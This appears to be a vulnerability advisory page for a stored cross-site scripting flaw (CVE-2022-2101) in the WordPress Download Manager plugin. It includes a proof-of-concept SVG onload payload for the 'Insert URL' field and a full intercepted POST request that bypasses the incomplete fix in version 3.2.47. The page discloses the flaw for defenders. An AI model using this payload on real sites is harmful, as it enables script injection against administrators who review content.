Lucene search
WpvulndbWPEX-ID:68D7E132-BB8C-4E83-B8AA-39067FBD638EHistoryJun 22, 2022 - 12:00 a.m.
Download Manager < 3.2.48 - Contributor+ Stored Cross-Site Scripting
2022-06-2200:00:00
wpvulndb
91
cross-site scripting
contributor
download manager
admin review
security exploit
request interception
payload insertion
vulnerability detection
EPSS
0.002
Percentile
61.3%
The plugin does not sanitise and escape the ‘Insert URL’ field, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks. Note: The attempted fix made in 3.2.46 and 3.2.47 were found to be insufficient
As a contributor, create/edit a download and put the following payload in the 'Insert URL" field: https://example.com/?a="><svg/onload=alert(/XSS/)>
Then click on the + button next to the field to save the URL and click on the Submit for Review button
The XSS will be triggered when editing the Download (for example when an admin will review it)
In 3.2.47, the attack is still possible by adding a dummy URL, then intercepting the request made when saving the File Post and changing the file[files][] parameter to https://example.com/?a="><svg/onload=alert(/XSS/)>:
POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1887
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
_wpnonce=d1f3acca93&user_ID=1&action=editpost&originalaction=editpost&post_author=5&post_type=wpdmpro&original_post_status=publish&post_ID=6324&meta-box-order-nonce=0df29a4137&closedpostboxesnonce=ac72c29968&post_title=XSS+Contrib&samplepermalinknonce=db423b3cbb&content=&file%5Bfiles%5D%5B%5D=https%3a%2f%2fexample.com%2f%3fa%3d%22%3e%3csvg%2fonload%3dalert(%2fXSS%2f)%3e&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=06&jj=30&aa=2022&hh=22&mn=21&ss=28&hidden_mm=06&cur_mm=06&hidden_jj=30&cur_jj=30&hidden_aa=2022&cur_aa=2022&hidden_hh=22&cur_hh=22&hidden_mn=21&cur_mn=21&original_publish=Update&save=Update&tax_input%5Bwpdmcategory%5D%5B%5D=0&newwpdmcategory=New+Category+Name&newwpdmcategory_parent=-1&_ajax_nonce-add-wpdmcategory=67f0ab91c8&tax_input%5Bwpdmtag%5D=&newtag%5Bwpdmtag%5D=&_thumbnail_id=-1&excerpt=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=925d3f1564&advanced_view=1&comment_status=open&add_comment_nonce=d2ac60592b&_ajax_fetch_list_nonce=608563959a&post_name=xss-contrib&post_author_override=5&file%5Bversion%5D=&file%5Blink_label%5D=&file%5Bquota%5D=&file%5Bview_count%5D=1&file%5Bdownload_count%5D=&file%5Bpackage_size%5D=&file%5Baccess%5D%5B%5D=guest&file%5Bpage_template%5D=page-template-default.php&file%5Bterms_page%5D=&file%5Bterms_title%5D=&file%5Bterms_conditions%5D=&file%5Bterms_check_label%5D=&file%5Bpassword%5D=&file%5Bicon%5D=References
Related
patchstack
patchstack
prion
prion
Cross site scripting
2022-07-18 17:15:00
cve
cve
CVE-2022-2101
2022-07-18 17:15:08
nvd
nvd
CVE-2022-2101
2022-07-18 17:15:08
packetstorm
packetstorm
WordPress Download Manager 3.2.43 Cross Site Scripting
2022-06-22 00:00:00
openvas
openvas
WordPress Download Manager Plugin <= 3.2.46 XSS Vulnerability
2022-07-19 00:00:00
wpvulndb
wpvulndb
Download Manager < 3.2.48 - Contributor+ Stored Cross-Site Scripting
2022-06-22 00:00:00
cvelist
cvelist
CVE-2022-2101
2022-07-18 16:13:21